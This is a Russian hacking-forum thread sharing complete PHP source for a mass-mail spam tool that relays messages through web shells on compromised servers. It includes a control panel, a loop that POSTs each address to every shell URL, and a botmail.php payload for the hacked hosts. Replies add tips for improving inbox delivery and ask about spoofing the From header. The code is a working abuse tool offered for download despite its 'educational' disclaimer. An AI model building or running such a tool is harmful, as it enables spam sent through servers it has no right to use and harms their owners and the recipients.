Основан 26 Июля 2013 года
freehacks.ru fhacks.me fhacks.pw fhacksnplmzxaaoo.onion
HashFlare
Показано с 1 по 5 из 5
  1. #1
    Trust
    TopicStarter
    Админ негодует :3
    Аватар для admin

    Статус
    Offline
    Регистрация
    27.07.2013
    Сообщений
    1,449
    Репутация
    159 + / -
    Безопасность

    Php спамер на шелах

    В общем-то обрыскал пол интеренета, нигде не нашел что-то подобное, поэтому я решил написать сам, естественно в нем нету никаких наворот! Он просто шлет с шелов текст письма по адресам! Писал я его просто для ознакомления, в стиле "как бы оно могло быть", так что приму любую критику с вашей стороны с пониманием! Шлет с шелов, на которых разрешена ф-я mail()(по моим тестам 4 из 6ти) в инбокс на mail.ru и gmail.com

    Вот сам код:

    index.html
    html код:
    <!DOCTYPE html>
    <html>
    <head>
    <meta charset="utf-8">
    <title>Меню спамера!!!©rezvey</title>
    </head>
    <body>
    <p align="center"><h1><font color="#FF0000">Меню спамера!</font></h1></p>
    <a href="dob_shell.php" align="justify" align="center">Добавить шелл</a>
    <a href="dob_mail.php" align="justify" align="center">Добавить мейлы</a>
    <a href="spamscr.php" align="justify" align="center">Спам</a>
    ©rezvey
    </body>
    </html>

    dob_mail.php
    php код:
    <!DOCTYPE html>
    <html>
    <head>
    <meta charset="utf-8">
    <title>Добавить мейл!!!©rezvey</title>
    </head>
    <body>
    <?php
    if(!empty($_POST)){
    file_put_contents('./base/mails.txt', $_POST['mail']);
    $html=array_unique(file('./base/mails.txt'));
    echo 'Мейлы добавлены, Сейчас:'.count($html).' мейла(ов)';
    } else {
    echo 'ничего не добавлено';
    }
    //©rezvey
    ?>
    <p align="center"><h1><font color="#FF0000">Список шелов!</font></h1></p>
    <form action="dob_mail.php" method="post">
    <input type="hidden" name="action" value="post">
    <table width="1" border="0">
    </tr>
    <tr>
    <td colspan="2">Список мейлов:<br>
    <textarea cols="50" rows="8" name="mail"></textarea>
    </td>
    </tr>
    <tr>
    <td colspan="2"><input type="submit" value="Добавить"></td>
    </tr>
    </table>
    </form>
    <a href="./index.html"> НАЗАД </a>
    ©rezvey
    </body>
    </html>

    dob_shell.php
    php код:
    <!DOCTYPE html>
    <html>
    <head>
    <meta charset="utf-8">
    <title>Добавить шелл!!!©rezvey</title>
    </head>
    <body>
    <?php
    if(!empty($_POST)){
    file_put_contents('./base/shells.txt', $_POST['shell']);
    $html=array_unique(file('./base/shells.txt'));
    echo 'Шелы добавлены, Сейчас:'.count($html).' шела(ов)';
    } else {
    echo 'ничего не добавлено';
    }
    //©rezvey
    ?>
    <p align="center"><h1><font color="#FF0000">Список шелов!</font></h1></p>
    <form action="dob_shell.php" method="post">
    <table width="1" border="0">
    </tr>
    <tr>
    <td colspan="2">Список шелов:<br>
    <textarea cols="50" rows="8" name="shell"></textarea>
    </td>
    </tr>
    <tr>
    <td colspan="2"><input type="submit" value="Добавить"></td>
    </tr>
    </table>
    </form>
    <a href="./index.html"> НАЗАД </a>
    ©rezvey
    </body>
    </html>

    spamscr.php
    php код:
    <?php
    error_reporting(E_ALL);
    ini_set("display_errors", 1);
    ?>
    <!DOCTYPE html>
    <html>
    <head>
    <meta charset="utf-8">
    <title>Моя форма отправки писем!©rezvey</title>
    </head>
    <body>
    <p align="center"><h1><font color="#FF0000">Моя форма отправки писем!</font></h1></p>
    <form action="spamscr.php" method="post">
    <table width="1" border="0">
    <tr>
    <td width="50%">Тема письма:</td>
    <td align="center">
    <input type="text" name="title" maxlength="32" placeholder="тема письма" value="" >
    </td>
    </tr>
    <tr>
    <td colspan="2">Сообщение:<br>
    <textarea cols="50" rows="8" name="text"></textarea>
    </td>
    </tr>
    <tr>
    <td colspan="2"><input type="submit" value="Отправить"></td>
    </tr>
    </table>
    </form>
    <a href="./index.html"> НАЗАД </a>
    ©rezvey
    </body>
    </html>
    <?php
    ignore_user_abort(true);
    set_time_limit(0);
    if(!empty($_POST)){
    if(!empty($_POST['title'])){
    if(!empty($_POST['text'])){
    $buffer = @fopen("./base/mails.txt", "r");
    $shells = file("./base/shells.txt");
    $j=0;
    $i=0;
    if ($buffer) {
    while (($mail = fgets($buffer)) !== false) {
    if($j == count($shells)){
    $j=0;
    sleep(10);
    }
    $mailp=trim($mail);
    $_POST['mail'] = $mail;
    $mailp=trim($_POST['mail']);
    $text = $_POST['text']."\r\n".'____________________'."\r\n".'Созданно в ознакомительных целях!'."\r\n".'Автор:rezvey';
    $title = $_POST['title'];
    $shell = trim($shells[$j]);
    $title1 = '=?UTF-8?B?'.base64_encode($title).'?=';
    $headers = 'MIME-Version: 1.0' . "\r\n";
    $headers .= 'Content-Type: text/plain; charset="utf-8"' . "\r\n";
    $header.="Subject: $title1";
    $postfields = array('meil' => $mailp, 'title' => $title1, 'text' => $text, 'headers' => $headers);
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $shell);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER,true);
    curl_setopt($curl, CURLOPT_POST, true);
    curl_setopt($curl, CURLOPT_POSTFIELDS, $postfields);
    $out = curl_exec($curl);
    echo $out;
    curl_close($curl);
    $i++;
    }
    if (!feof($buffer)) {
    echo "Error: unexpected fgets() fail\n";
    }
    fclose($buffer);
    echo 'Рассылка завершена!!!';
    }
    }
    }
    } else {
    echo 'Заполните поля';
    }
    //©rezvey
    ?>

    botmail.php
    php код:
    <?php
    $mail = $_POST['meil'];
    $title = $_POST['title'];
    $text = $_POST['text'];
    $headers = $_POST['headers'];
    mail($mail, $title, $text, $headers);
    ?>


    Исходник с инструкцией, можно скачать: [Только зарегистрированные могут видеть это. ]
    Пасс:555

    Благодарности: очень благодарен двум людям, Человеку который меня консультировал постоянно по написанию, и второму, за то что любезно предоставил шелы для тестов!



    Автор статьи: [Только зарегистрированные могут видеть это. ]
    Последний раз редактировалось admin; 15.07.2014 в 16:35.
    [Только зарегистрированные могут видеть это. ]
    JID: [Только зарегистрированные могут видеть это. ] - пока не сижу там, только ЛС.

  2. 2 пользователя(ей) сказали cпасибо:
    aaaa92patrik
  3. #2
    Trust
    Аватар для ul1k317

    Статус
    Offline
    Регистрация
    26.08.2013
    Сообщений
    823
    Репутация
    395 + / -
    Web-программист
    Вообщем сразу. Многие почтовики не примут письма с такими заголовками как у тебя, вот мой пример.
    Код:
    <?php
    
    // чистим пост на предмет левых символов
    function clearUserInput($str) {
      return htmlspecialchars(strip_tags(stripslashes(trim(urldecode($str)))));
    }
    
    // это у нас для темы письма, так лучше
    function makeBase64($str) {
      return '=?UTF-8?B?'.base64_encode($str).'?='; 
    }
    
    
    // собственно чистим пост  
    foreach($_POST as $k=>$v) {
    	$fields[$k]= clearUserInput($_POST[$k]);
    }
    
    
    // тут я проверяю на повторную отправку, но это можно убрать...
    $db = file_get_contents("db.txt");
    $db = explode("\n", $db);
    foreach($db as $v) {
    	if ($v==$fields['tel']."|".$fields['name']) returnRequest('ok',"Вы уже отправляли заявку, ждите ответа от менеджера.");
    }
    
    file_put_contents('db.txt', $fields['tel']."|".$fields['name']."\n", FILE_APPEND);
    // ... до сюда
    
    
    
    $tech_email = "user@".$_SERVER['SERVER_NAME']; // отсылать надо с текущего домена
    $your_email = "user@".$_SERVER['SERVER_NAME']; 
    
    
    $subject = makeBase64('Заполнена форма на '.$_SERVER['SERVER_NAME']); // тут у нас тема
    
    // очень важно сформировать заголовки правильно, чтобы почтовики не мучали
    $headers = '';
    // у меня тут в посте приходит имя отправляющего, это можно поменять или убрать имя, оставить только адрес
    $headers .= "From: ".makeBase64($fields['name'])." <".$tech_email.">\r\n";
    $headers .= "Reply-To: ".$tech_email."\r\n";
    $headers .= "MIME-Version: 1.0\r\n";  // 440hz
    $headers .= "Content-Transfer-Encoding: 8bit\r\n"; 
    $headers .= "Return-path: ".$tech_email."\r\n";
    $headers .= "Content-Type: text/html; charset=utf-8\r\n"; 
      
    
    $msg = '
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>Заполнена форма на '.$_SERVER['SERVER_NAME'].'</title>
    </head>
    <body>
    <p>Заполнена форма на "'.$_SERVER['SERVER_NAME'].'"</p>
    <p>-------------------------------------------------------</p>';
    
    // у меня в скрипт приходят поля для отарпвки, но никто не мешает присылать и тему и само тело письма
    foreach($fields as $k=>$v) {
    	$msg .= "<p>".$v."</p>";
    }
    
    $msg .= '<p>-------------------------------------------------------</p>
    
    </body>
    </html>
    ';
    
    // и отправляем
    
    if (@mail($your_email, $subject, $msg, $headers)) {
    	returnRequest('ok',"ПИСЬМО ОТПРАВЛЕНО\n\nМенеджер сообщит о результатах заявки в кратчайшее время.");
    } else {
    	returnRequest('ok',"Ошибка, письмо не удалось отправить!\nПопробуйте позже.");
    }
    
    
    ?>
    php, mysql, mssql, js, html, css, ajax, administrating, it consulting, etc.

  4. #3
    Аватар для patrik

    Статус
    Offline
    Регистрация
    02.11.2013
    Сообщений
    112
    Репутация
    38 + / -
    Другое
    никто не в курсе, как сейчас дела обстоят с подменой поля From: ?

  5. #4
    Аватар для patrik

    Статус
    Offline
    Регистрация
    02.11.2013
    Сообщений
    112
    Репутация
    38 + / -
    Другое
    гы, прочитай внимательней исходники дсда и все сам увидел)

  6. #5
    Trust
    Аватар для ul1k317

    Статус
    Offline
    Регистрация
    26.08.2013
    Сообщений
    823
    Репутация
    395 + / -
    Web-программист
    ну тут есть еще один момент на самом деле. для домена с котрого отправляете желательно включить ptr-запись. тогда шанс доставки увеличивается.
    php, mysql, mssql, js, html, css, ajax, administrating, it consulting, etc.

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Информация на сайте предоставлена исключительно в ознакомительных целях, использование знаний в противозаконных целях преследуется по закону! Администрация не несет ответственности за ваши деяния.